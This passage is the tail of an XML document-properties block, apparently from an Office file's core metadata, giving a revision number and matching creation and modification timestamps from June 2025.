  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-06-02T22:55:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-06-02T22:55:00Z</dcterms:modified>
</cp:coreProperties>
</file>